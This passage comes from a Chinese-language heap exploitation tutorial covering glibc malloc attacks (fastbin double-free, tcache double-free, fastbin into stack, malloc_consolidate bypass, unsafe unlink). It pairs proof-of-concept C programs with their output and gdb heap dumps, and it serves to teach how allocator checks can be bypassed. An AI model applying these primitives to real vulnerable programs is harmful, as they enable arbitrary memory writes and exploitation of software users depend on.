fprintf(stderr, "4st malloc(9) %p points to %s the first time\n", d, d);
strcpy(e, "EEEEEEEE");
fprintf(stderr, "5nd malloc(9) %p points to %s\n", e, e);
strcpy(f, "FFFFFFFF");
fprintf(stderr, "6rd malloc(9) %p points to %s the second time\n", f, f);
}
$ gcc -g fastbin_dup.c
$ ./a.out
Allocating 3 buffers.
1st malloc(9) 0x1c07010 points to AAAAAAAA
2nd malloc(9) 0x1c07030 points to BBBBBBBB
3rd malloc(9) 0x1c07050 points to CCCCCCCC
Freeing the first one 0x1c07010.
Then freeing another one 0x1c07030.
Freeing the first one 0x1c07010 again.
Allocating 3 buffers.
4st malloc(9) 0x1c07010 points to DDDDDDDD the first time
5nd malloc(9) 0x1c07030 points to EEEEEEEE
6rd malloc(9) 0x1c07010 points to FFFFFFFF the second time
这个程序展示了利用 fastbins 的 double-free 攻击,可以泄漏出一块已经被分配的内存指针。fastbins 可以看成一个 LIFO 的栈,使用单链表实现,通过 fastbin->fd 来遍历 fastbins。由于 free 的过程会对 free list 做检查,我们不能连续两次 free 同一个 chunk,所以这里在两次 free 之间,增加了一次对其他 chunk 的 free 过程,从而绕过检查顺利执行。然后再 malloc 三次,就在同一个地址 malloc 了两次,也就有了两个指向同一块内存区域的指针。
libc-2.23 中对 double-free 的检查过程如下:
/* Check that the top of the bin is not the record we are going to add
(i.e., double free). */
if (__builtin_expect (old == p, 0))
{
errstr = "double free or corruption (fasttop)";
goto errout;
}
它在检查 fast bin 的 double-free 时只是检查了第一个块。所以其实是存在缺陷的。
三个 malloc 之后:
gef➤ x/15gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021 <-- chunk a
0x602010: 0x4141414141414141 0x0000000000000000
0x602020: 0x0000000000000000 0x0000000000000021 <-- chunk b
0x602030: 0x4242424242424242 0x0000000000000000
0x602040: 0x0000000000000000 0x0000000000000021 <-- chunk c
0x602050: 0x4343434343434343 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000020fa1 <-- top chunk
0x602070: 0x0000000000000000
第一个 free 之后,chunk a 被添加到 fastbins 中:
gef➤ x/15gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021 <-- chunk a [be freed]
0x602010: 0x0000000000000000 0x0000000000000000 <-- fd pointer
0x602020: 0x0000000000000000 0x0000000000000021 <-- chunk b
0x602030: 0x4242424242424242 0x0000000000000000
0x602040: 0x0000000000000000 0x0000000000000021 <-- chunk c
0x602050: 0x4343434343434343 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000020fa1
0x602070: 0x0000000000000000
gef➤ heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10] ← Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)
第二个 free 之后,chunk b 被添加到 fastbins 中:
gef➤ x/15gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021 <-- chunk a [be freed]
0x602010: 0x0000000000000000 0x0000000000000000 <-- fd pointer
0x602020: 0x0000000000000000 0x0000000000000021 <-- chunk b [be freed]
0x602030: 0x0000000000602000 0x0000000000000000 <-- fd pointer
0x602040: 0x0000000000000000 0x0000000000000021 <-- chunk c
0x602050: 0x4343434343434343 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000020fa1
0x602070: 0x0000000000000000
gef➤ heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10] ← Chunk(addr=0x602030, size=0x20, flags=PREV_INUSE) ← Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)
此时由于 chunk a 处于 bin 中第 2 块的位置,不会被 double-free 的检查机制检查出来。所以第三个 free 之后,chunk a 再次被添加到 fastbins 中:
gef➤ x/15gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021 <-- chunk a [be freed again]
0x602010: 0x0000000000602020 0x0000000000000000 <-- fd pointer
0x602020: 0x0000000000000000 0x0000000000000021 <-- chunk b [be freed]
0x602030: 0x0000000000602000 0x0000000000000000 <-- fd pointer
0x602040: 0x0000000000000000 0x0000000000000021 <-- chunk c
0x602050: 0x4343434343434343 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000020fa1
0x602070: 0x0000000000000000
gef➤ heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10] ← Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE) ← Chunk(addr=0x602030, size=0x20, flags=PREV_INUSE) ← Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE) → [loop detected]
此时 chunk a 和 chunk b 似乎形成了一个环。
再三个 malloc 之后:
gef➤ x/15gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021 <-- chunk d, chunk f
0x602010: 0x4646464646464646 0x0000000000000000
0x602020: 0x0000000000000000 0x0000000000000021 <-- chunk e
0x602030: 0x4545454545454545 0x0000000000000000
0x602040: 0x0000000000000000 0x0000000000000021 <-- chunk c
0x602050: 0x4343434343434343 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000020fa1
0x602070: 0x0000000000000000
所以对于 fastbins,可以通过 double-free 泄漏出一个堆块的指针。
加上内存检测参数重新编译:
$ gcc -fsanitize=address -g fastbin_dup.c
$ ./a.out
Allocating 3 buffers.
1st malloc(9) 0x60200000eff0 points to AAAAAAAA
2nd malloc(9) 0x60200000efd0 points to BBBBBBBB
3rd malloc(9) 0x60200000efb0 points to CCCCCCCC
Freeing the first one 0x60200000eff0.
Then freeing another one 0x60200000efd0.
Freeing the first one 0x60200000eff0 again.
=================================================================
==5650==ERROR: AddressSanitizer: attempting double-free on 0x60200000eff0 in thread T0:
#0 0x7fdc18ebf2ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca)
#1 0x400ba3 in main /home/firmy/how2heap/fastbin_dup.c:22
#2 0x7fdc18a7d82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#3 0x400878 in _start (/home/firmy/how2heap/a.out+0x400878)
0x60200000eff0 is located 0 bytes inside of 9-byte region [0x60200000eff0,0x60200000eff9)
freed by thread T0 here:
#0 0x7fdc18ebf2ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca)
#1 0x400b0d in main /home/firmy/how2heap/fastbin_dup.c:18
#2 0x7fdc18a7d82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
previously allocated by thread T0 here:
#0 0x7fdc18ebf602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
#1 0x400997 in main /home/firmy/how2heap/fastbin_dup.c:7
#2 0x7fdc18a7d82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
一个很明显的 double-free 漏洞。关于这类漏洞的详细利用过程,我们会在后面的章节里再讲。
看一点新鲜的,在 libc-2.26 中,即使两次 free,也并没有触发 double-free 的异常检测,这与 tcache 机制有关,以后会详细讲述。这里先看个能够在该版本下触发 double-free 的例子:
#include <stdio.h>
#include <stdlib.h>
int main() {
int i;
void *p = malloc(0x40);
fprintf(stderr, "First allocate a fastbin: p=%p\n", p);
fprintf(stderr, "Then free(p) 7 times\n");
for (i = 0; i < 7; i++) {
fprintf(stderr, "free %d: %p => %p\n", i+1, &p, p);
free(p);
}
fprintf(stderr, "Then malloc 8 times at the same address\n");
int *a[10];
for (i = 0; i < 8; i++) {
a[i] = malloc(0x40);
fprintf(stderr, "malloc %d: %p => %p\n", i+1, &a[i], a[i]);
}
fprintf(stderr, "Finally trigger double-free\n");
for (i = 0; i < 2; i++) {
fprintf(stderr, "free %d: %p => %p\n", i+1, &a[i], a[i]);
free(a[i]);
}
}
$ gcc -g tcache_double-free.c
$ ./a.out
First allocate a fastbin: p=0x559e30950260
Then free(p) 7 times
free 1: 0x7ffc498b2958 => 0x559e30950260
free 2: 0x7ffc498b2958 => 0x559e30950260
free 3: 0x7ffc498b2958 => 0x559e30950260
free 4: 0x7ffc498b2958 => 0x559e30950260
free 5: 0x7ffc498b2958 => 0x559e30950260
free 6: 0x7ffc498b2958 => 0x559e30950260
free 7: 0x7ffc498b2958 => 0x559e30950260
Then malloc 8 times at the same address
malloc 1: 0x7ffc498b2960 => 0x559e30950260
malloc 2: 0x7ffc498b2968 => 0x559e30950260
malloc 3: 0x7ffc498b2970 => 0x559e30950260
malloc 4: 0x7ffc498b2978 => 0x559e30950260
malloc 5: 0x7ffc498b2980 => 0x559e30950260
malloc 6: 0x7ffc498b2988 => 0x559e30950260
malloc 7: 0x7ffc498b2990 => 0x559e30950260
malloc 8: 0x7ffc498b2998 => 0x559e30950260
Finally trigger double-free
free 1: 0x7ffc498b2960 => 0x559e30950260
free 2: 0x7ffc498b2968 => 0x559e30950260
double free or corruption (fasttop)
[2] 1244 abort (core dumped) ./a.out
fastbin_dup_into_stack
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main() {
unsigned long long stack_var = 0x21;
fprintf(stderr, "Allocating 3 buffers.\n");
char *a = malloc(9);
char *b = malloc(9);
char *c = malloc(9);
strcpy(a, "AAAAAAAA");
strcpy(b, "BBBBBBBB");
strcpy(c, "CCCCCCCC");
fprintf(stderr, "1st malloc(9) %p points to %s\n", a, a);
fprintf(stderr, "2nd malloc(9) %p points to %s\n", b, b);
fprintf(stderr, "3rd malloc(9) %p points to %s\n", c, c);
fprintf(stderr, "Freeing the first one %p.\n", a);
free(a);
fprintf(stderr, "Then freeing another one %p.\n", b);
free(b);
fprintf(stderr, "Freeing the first one %p again.\n", a);
free(a);
fprintf(stderr, "Allocating 4 buffers.\n");
unsigned long long *d = malloc(9);
*d = (unsigned long long) (((char*)&stack_var) - sizeof(d));
fprintf(stderr, "4nd malloc(9) %p points to %p\n", d, &d);
char *e = malloc(9);
strcpy(e, "EEEEEEEE");
fprintf(stderr, "5nd malloc(9) %p points to %s\n", e, e);
char *f = malloc(9);
strcpy(f, "FFFFFFFF");
fprintf(stderr, "6rd malloc(9) %p points to %s\n", f, f);
char *g = malloc(9);
strcpy(g, "GGGGGGGG");
fprintf(stderr, "7th malloc(9) %p points to %s\n", g, g);
}
$ gcc -g fastbin_dup_into_stack.c
$ ./a.out
Allocating 3 buffers.
1st malloc(9) 0xcf2010 points to AAAAAAAA
2nd malloc(9) 0xcf2030 points to BBBBBBBB
3rd malloc(9) 0xcf2050 points to CCCCCCCC
Freeing the first one 0xcf2010.
Then freeing another one 0xcf2030.
Freeing the first one 0xcf2010 again.
Allocating 4 buffers.
4nd malloc(9) 0xcf2010 points to 0x7ffd1e0d48b0
5nd malloc(9) 0xcf2030 points to EEEEEEEE
6rd malloc(9) 0xcf2010 points to FFFFFFFF
7th malloc(9) 0x7ffd1e0d48b0 points to GGGGGGGG
这个程序展示了怎样通过修改 fd 指针,将其指向一个伪造的 free chunk,在伪造的地址处 malloc 出一个 chunk。该程序大部分内容都和上一个程序一样,漏洞也同样是 double-free,只有给 fd 填充的内容不一样。
三个 malloc 之后:
gef➤ x/15gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021 <-- chunk a
0x602010: 0x4141414141414141 0x0000000000000000
0x602020: 0x0000000000000000 0x0000000000000021 <-- chunk b
0x602030: 0x4242424242424242 0x0000000000000000
0x602040: 0x0000000000000000 0x0000000000000021 <-- chunk c
0x602050: 0x4343434343434343 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000020fa1 <-- top chunk
0x602070: 0x0000000000000000
三个 free 之后:
gef➤ x/15gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021 <-- chunk a [be freed twice]
0x602010: 0x0000000000602020 0x0000000000000000 <-- fd pointer
0x602020: 0x0000000000000000 0x0000000000000021 <-- chunk b [be freed]
0x602030: 0x0000000000602000 0x0000000000000000 <-- fd pointer
0x602040: 0x0000000000000000 0x0000000000000021 <-- chunk c
0x602050: 0x4343434343434343 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000020fa1
0x602070: 0x0000000000000000
gef➤ heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10] ← Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE) ← Chunk(addr=0x602030, size=0x20, flags=PREV_INUSE) ← Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE) → [loop detected]
这一次 malloc 之后,我们不再填充无意义的 "DDDDDDDD",而是填充一个地址,即栈地址减去 0x8,从而在栈上伪造出一个 free 的 chunk(当然也可以是其他的地址)。这也是为什么 stack_var
被我们设置为 0x21
(或0x20
都可以),其实是为了在栈地址减去 0x8 的时候作为 fake chunk 的 size 字段。
glibc 在执行分配操作时,若块的大小符合 fast bin,则会在对应的 bin 中寻找合适的块,此时 glibc 将根据候选块的 size 字段计算出 fastbin 索引,然后与对应 bin 在 fastbin 中的索引进行比较,如果二者不匹配,则说明块的 size 字段遭到破坏。所以需要 fake chunk 的 size 字段被设置为正确的值。
/* offset 2 to use otherwise unindexable first 2 bins */
#define fastbin_index(sz) \
((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
{
idx = fastbin_index (nb);
[...]
if (victim != 0)
{
if (__builtin_expect (fastbin_index (chunksize (victim)) != idx, 0))
{
errstr = "malloc(): memory corruption (fast)";
[...]
}
[...]
}
}
简单地说就是 fake chunk 的 size 与 double-free 的 chunk 的 size 相同即可。
gef➤ x/15gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021 <-- chunk d
0x602010: 0x00007fffffffdc30 0x0000000000000000 <-- fd pointer
0x602020: 0x0000000000000000 0x0000000000000021 <-- chunk b [be freed]
0x602030: 0x0000000000602000 0x0000000000000000 <-- fd pointer
0x602040: 0x0000000000000000 0x0000000000000021 <-- chunk c
0x602050: 0x4343434343434343 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000020fa1
0x602070: 0x0000000000000000
gef➤ p &stack_var
$4 = (unsigned long long *) 0x7fffffffdc38
gef➤ x/5gx 0x7fffffffdc38-0x8
0x7fffffffdc30: 0x0000000000000000 0x0000000000000021 <-- fake chunk [seems to be freed]
0x7fffffffdc40: 0x0000000000602010 0x0000000000602010 <-- fd pointer
0x7fffffffdc50: 0x0000000000602030
gef➤ heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10] ← Chunk(addr=0x602030, size=0x20, flags=PREV_INUSE) ← Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE) ← Chunk(addr=0x7fffffffdc40, size=0x20, flags=PREV_INUSE) ← Chunk(addr=0x602020, size=0x0, flags=) [incorrect fastbin_index]
可以看到,伪造的 chunk 已经由指针链接到 fastbins 上了。之后 malloc 两次,即可将伪造的 chunk 移动到链表头部:
gef➤ x/15gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021
0x602010: 0x4646464646464646 0x0000000000000000
0x602020: 0x0000000000000000 0x0000000000000021
0x602030: 0x4545454545454545 0x0000000000000000
0x602040: 0x0000000000000000 0x0000000000000021
0x602050: 0x4343434343434343 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000020fa1
0x602070: 0x0000000000000000
gef➤ heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10] ← Chunk(addr=0x7fffffffdc40, size=0x20, flags=PREV_INUSE) ← Chunk(addr=0x602020, size=0x0, flags=) [incorrect fastbin_index]
再次 malloc,即可在 fake chunk 处分配内存:
gef➤ x/5gx 0x7fffffffdc38-0x8
0x7fffffffdc30: 0x0000000000000000 0x0000000000000021 <-- fake chunk
0x7fffffffdc40: 0x4747474747474747 0x0000000000602000
0x7fffffffdc50: 0x0000000000602030
所以对于 fastbins,可以通过 double-free 覆盖 fastbins 的结构,来获得一个指向任意地址的指针。
fastbin_dup_consolidate
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
int main() {
void *p1 = malloc(0x10);
void *p2 = malloc(0x10);
strcpy(p1, "AAAAAAAA");
strcpy(p2, "BBBBBBBB");
fprintf(stderr, "Allocated two fastbins: p1=%p p2=%p\n", p1, p2);
fprintf(stderr, "Now free p1!\n");
free(p1);
void *p3 = malloc(0x400);
fprintf(stderr, "Allocated large bin to trigger malloc_consolidate(): p3=%p\n", p3);
fprintf(stderr, "In malloc_consolidate(), p1 is moved to the unsorted bin.\n");
free(p1);
fprintf(stderr, "Trigger the double free vulnerability!\n");
fprintf(stderr, "We can pass the check in malloc() since p1 is not fast top.\n");
void *p4 = malloc(0x10);
strcpy(p4, "CCCCCCC");
void *p5 = malloc(0x10);
strcpy(p5, "DDDDDDDD");
fprintf(stderr, "Now p1 is in unsorted bin and fast bin. So we'will get it twice: %p %p\n", p4, p5);
}
$ gcc -g fastbin_dup_consolidate.c
$ ./a.out
Allocated two fastbins: p1=0x17c4010 p2=0x17c4030
Now free p1!
Allocated large bin to trigger malloc_consolidate(): p3=0x17c4050
In malloc_consolidate(), p1 is moved to the unsorted bin.
Trigger the double free vulnerability!
We can pass the check in malloc() since p1 is not fast top.
Now p1 is in unsorted bin and fast bin. So we'will get it twice: 0x17c4010 0x17c4010
这个程序展示了利用在 large bin 的分配中 malloc_consolidate 机制绕过 fastbin 对 double free 的检查,这个检查在 fastbin_dup 中已经展示过了,只不过它利用的是在两次 free 中间插入一次对其它 chunk 的 free。
首先分配两个 fast chunk:
gef➤ x/15gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021 <-- chunk p1
0x602010: 0x4141414141414141 0x0000000000000000
0x602020: 0x0000000000000000 0x0000000000000021 <-- chunk p2
0x602030: 0x4242424242424242 0x0000000000000000
0x602040: 0x0000000000000000 0x0000000000020fc1 <-- top chunk
0x602050: 0x0000000000000000 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000000000
0x602070: 0x0000000000000000
释放掉 p1,则空闲 chunk 加入到 fastbins 中:
gef➤ x/15gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021 <-- chunk p1 [be freed]
0x602010: 0x0000000000000000 0x0000000000000000
0x602020: 0x0000000000000000 0x0000000000000021 <-- chunk p2
0x602030: 0x4242424242424242 0x0000000000000000
0x602040: 0x0000000000000000 0x0000000000020fc1 <-- top chunk
0x602050: 0x0000000000000000 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000000000
0x602070: 0x0000000000000000
gef➤ heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10] ← Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)
此时如果我们再次释放 p1,必然触发 double free 异常,然而,如果此时分配一个 large chunk,效果如下:
gef➤ x/15gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021 <-- chunk p1 [be freed]
0x602010: 0x00007ffff7dd1b88 0x00007ffff7dd1b88 <-- fd, bk pointer
0x602020: 0x0000000000000020 0x0000000000000020 <-- chunk p2
0x602030: 0x4242424242424242 0x0000000000000000
0x602040: 0x0000000000000000 0x0000000000000411 <-- chunk p3
0x602050: 0x0000000000000000 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000000000
0x602070: 0x0000000000000000
gef➤ heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10] 0x00
gef➤ heap bins small
[ Small Bins for arena 'main_arena' ]
[+] small_bins[1]: fw=0x602000, bk=0x602000
→ Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)
[+] Found 1 chunks in 1 small non-empty bins.
可以看到 fastbins 中的 chunk 已经不见了,反而出现在了 small bins 中,并且 chunk p2 的 prev_size 和 size 字段都被修改。
看一下 large chunk 的分配过程:
/*
If this is a large request, consolidate fastbins before continuing.
While it might look excessive to kill all fastbins before
even seeing if there is space available, this avoids
fragmentation problems normally associated with fastbins.
Also, in practice, programs tend to have runs of either small or
large requests, but less often mixtures, so consolidation is not
invoked all that often in most programs. And the programs that
it is called frequently in otherwise tend to fragment.
*/
else
{
idx = largebin_index (nb);
if (have_fastchunks (av))
malloc_consolidate (av);
}
当分配 large chunk 时,首先根据 chunk 的大小获得对应的 large bin 的 index,接着判断当前分配区的 fast bins 中是否包含 chunk,如果有,调用 malloc_consolidate() 函数合并 fast bins 中的 chunk,并将这些空闲 chunk 加入 unsorted bin 中。因为这里分配的是一个 large chunk,所以 unsorted bin 中的 chunk 按照大小被放回 small bins 或 large bins 中。
由于此时 p1 已经不在 fastbins 的顶部,可以再次释放 p1:
gef➤ x/15gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021 <-- chunk p1 [double freed]
0x602010: 0x0000000000000000 0x00007ffff7dd1b88
0x602020: 0x0000000000000020 0x0000000000000020 <-- chunk p2
0x602030: 0x4242424242424242 0x0000000000000000
0x602040: 0x0000000000000000 0x0000000000000411 <-- chunk p3
0x602050: 0x0000000000000000 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000000000
0x602070: 0x0000000000000000
gef➤ heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10] ← Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)
gef➤ heap bins small
[ Small Bins for arena 'main_arena' ]
[+] small_bins[1]: fw=0x602000, bk=0x602000
→ Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)
[+] Found 1 chunks in 1 small non-empty bins.
p1 被再次放入 fastbins,于是 p1 同时存在于 fabins 和 small bins 中。
第一次 malloc,chunk 将从 fastbins 中取出:
gef➤ x/15gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021 <-- chunk p1 [be freed], chunk p4
0x602010: 0x0043434343434343 0x00007ffff7dd1b88
0x602020: 0x0000000000000020 0x0000000000000020 <-- chunk p2
0x602030: 0x4242424242424242 0x0000000000000000
0x602040: 0x0000000000000000 0x0000000000000411 <-- chunk p3
0x602050: 0x0000000000000000 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000000000
0x602070: 0x0000000000000000
gef➤ heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10] 0x00
gef➤ heap bins small
[ Small Bins for arena 'main_arena' ]
[+] small_bins[1]: fw=0x602000, bk=0x602000
→ Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)
[+] Found 1 chunks in 1 small non-empty bins.
第二次 malloc,chunk 从 small bins 中取出:
gef➤ x/15gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021 <-- chunk p4, chunk p5
0x602010: 0x4444444444444444 0x00007ffff7dd1b00
0x602020: 0x0000000000000020 0x0000000000000021 <-- chunk p2
0x602030: 0x4242424242424242 0x0000000000000000
0x602040: 0x0000000000000000 0x0000000000000411 <-- chunk p3
0x602050: 0x0000000000000000 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000000000
0x602070: 0x0000000000000000
chunk p4 和 p5 在同一位置。
unsafe_unlink
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
uint64_t *chunk0_ptr;
int main() {
int malloc_size = 0x80; // not fastbins
int header_size = 2;
chunk0_ptr = (uint64_t*) malloc(malloc_size); //chunk0
uint64_t *chunk1_ptr = (uint64_t*) malloc(malloc_size); //chunk1
fprintf(stderr, "The global chunk0_ptr is at %p, pointing to %p\n", &chunk0_ptr, chunk0_ptr);
fprintf(stderr, "The victim chunk we are going to corrupt is at %p\n\n", chunk1_ptr);
// pass this check: (P->fd->bk != P || P->bk->fd != P) == False
chunk0_ptr[2] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*3);
chunk0_ptr[3] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*2);
fprintf(stderr, "Fake chunk fd: %p\n", (void*) chunk0_ptr[2]);
fprintf(stderr, "Fake chunk bk: %p\n\n", (void*) chunk0_ptr[3]);
// pass this check: (chunksize(P) != prev_size (next_chunk(P)) == False
// chunk0_ptr[1] = 0x0; // or 0x8, 0x80
uint64_t *chunk1_hdr = chunk1_ptr - header_size;
chunk1_hdr[0] = malloc_size;
chunk1_hdr[1] &= ~1;
// deal with tcache
// int *a[10];
// int i;
// for (i = 0; i < 7; i++) {
// a[i] = malloc(0x80);
// }
// for (i = 0; i < 7; i++) {
// free(a[i]);
// }
free(chunk1_ptr);
char victim_string[9];
strcpy(victim_string, "AAAAAAAA");
chunk0_ptr[3] = (uint64_t) victim_string;
fprintf(stderr, "Original value: %s\n", victim_string);
chunk0_ptr[0] = 0x4242424242424242LL;
fprintf(stderr, "New Value: %s\n", victim_string);
}
$ gcc -g unsafe_unlink.c
$ ./a.out
The global chunk0_ptr is at 0x601070, pointing to 0x721010
The victim chunk we are going to corrupt is at 0x7210a0
Fake chunk fd: 0x601058
Fake chunk bk: 0x601060
Original value: AAAAAAAA
New Value: BBBBBBBB
这个程序展示了怎样利用 free 改写全局指针 chunk0_ptr 达到任意内存写的目的,即 unsafe unlink。该技术最常见的利用场景是我们有一个可以溢出漏洞和一个全局指针。
Ubuntu16.04 使用 libc-2.23,其中 unlink 实现的代码如下,其中有一些对前后堆块的检查,也是我们需要绕过的:
/* Take a chunk off a bin list */
#define unlink(AV, P, BK, FD) { \
FD = P->fd; \
BK = P->bk; \
if (__builtin_expect (FD->bk != P || BK->fd != P, 0)) \
malloc_printerr (check_action, "corrupted double-linked list", P, AV); \
else { \
FD->bk = BK; \
BK->fd = FD; \
if (!in_smallbin_range (P->size) \
&& __builtin_expect (P->fd_nextsize != NULL, 0)) { \
if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0) \
|| __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0)) \
malloc_printerr (check_action, \
"corrupted double-linked list (not small)", \
P, AV); \
if (FD->fd_nextsize == NULL) { \
if (P->fd_nextsize == P) \
FD->fd_nextsize = FD->bk_nextsize = FD; \
else { \
FD->fd_nextsize = P->fd_nextsize; \
FD->bk_nextsize = P->bk_nextsize; \
P->fd_nextsize->bk_nextsize = FD; \
P->bk_nextsize->fd_nextsize = FD; \
} \
} else { \
P->fd_nextsize->bk_nextsize = P->bk_nextsize; \
P->bk_nextsize->fd_nextsize = P->fd_nextsize; \
} \
} \
} \
}
在解链操作之前,针对堆块 P 自身的 fd 和 bk 检查了链表的完整性,即判断堆块 P 的前一块 fd 的指针是否指向 P,以及后一块 bk 的指针是否指向 P。
malloc_size 设置为 0x80,可以分配 small chunk,然后定义 header_size 为 2。申请两块空间,全局指针 chunk0_ptr
指向 chunk0,局部指针 chunk1_ptr
指向 chunk1:
gef➤ p &chunk0_ptr
$1 = (uint64_t **) 0x601070 <chunk0_ptr>
gef➤ x/gx &chunk0_ptr
0x601070 <chunk0_ptr>: 0x0000000000602010
gef➤ p &chunk1_ptr
$2 = (uint64_t **) 0x7fffffffdc60
gef➤ x/gx &chunk1_ptr
0x7fffffffdc60: 0x00000000006020a0
gef➤ x/40gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000091 <-- chunk 0
0x602010: 0x0000000000000000 0x0000000000000000
0x602020: 0x0000000000000000 0x0000000000000000
0x602030: 0x0000000000000000 0x0000000000000000
0x602040: 0x0000000000000000 0x0000000000000000
0x602050: 0x0000000000000000 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000000000
0x602070: 0x0000000000000000 0x0000000000000000
0x602080: 0x0000000000000000 0x0000000000000000
0x602090: 0x0000000000000000 0x0000000000000091 <-- chunk 1
0x6020a0: 0x0000000000000000 0x0000000000000000
0x6020b0: 0x0000000000000000 0x0000000000000000
0x6020c0: 0x0000000000000000 0x0000000000000000
0x6020d0: 0x0000000000000000 0x0000000000000000
0x6020e0: 0x0000000000000000 0x0000000000000000
0x6020f0: 0x0000000000000000 0x0000000000000000
0x602100: 0x0000000000000000 0x0000000000000000
0x602110: 0x0000000000000000 0x0000000000000000
0x602120: 0x0000000000000000 0x0000000000020ee1 <-- top chunk
0x602130: 0x0000000000000000 0x0000000000000000
接下来要绕过 (P->fd->bk != P || P->bk->fd != P) == False
的检查,这个检查有个缺陷,就是 fd/bk 指针都是通过与 chunk 头部的相对地址来查找的。所以我们可以利用全局指针 chunk0_ptr
构造 fake chunk 来绕过它:
gef➤ x/40gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000091 <-- chunk 0
0x602010: 0x0000000000000000 0x0000000000000000 <-- fake chunk P
0x602020: 0x0000000000601058 0x0000000000601060 <-- fd, bk pointer
0x602030: 0x0000000000000000 0x0000000000000000
0x602040: 0x0000000000000000 0x0000000000000000
0x602050: 0x0000000000000000 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000000000
0x602070: 0x0000000000000000 0x0000000000000000
0x602080: 0x0000000000000000 0x0000000000000000
0x602090: 0x0000000000000080 0x0000000000000090 <-- chunk 1 <-- prev_size
0x6020a0: 0x0000000000000000 0x0000000000000000
0x6020b0: 0x0000000000000000 0x0000000000000000
0x6020c0: 0x0000000000000000 0x0000000000000000
0x6020d0: 0x0000000000000000 0x0000000000000000
0x6020e0: 0x0000000000000000 0x0000000000000000
0x6020f0: 0x0000000000000000 0x0000000000000000
0x602100: 0x0000000000000000 0x0000000000000000
0x602110: 0x0000000000000000 0x0000000000000000
0x602120: 0x0000000000000000 0x0000000000020ee1 <-- top chunk
0x602130: 0x0000000000000000 0x0000000000000000
gef➤ x/5gx 0x601058
0x601058: 0x0000000000000000 0x00007ffff7dd2540 <-- fake chunk FD
0x601068: 0x0000000000000000 0x0000000000602010 <-- bk pointer
0x601078: 0x0000000000000000
gef➤ x/5gx 0x601060
0x601060: 0x00007ffff7dd2540 0x0000000000000000 <-- fake chunk BK
0x601070: 0x0000000000602010 0x0000000000000000 <-- fd pointer
0x601080: 0x0000000000000000
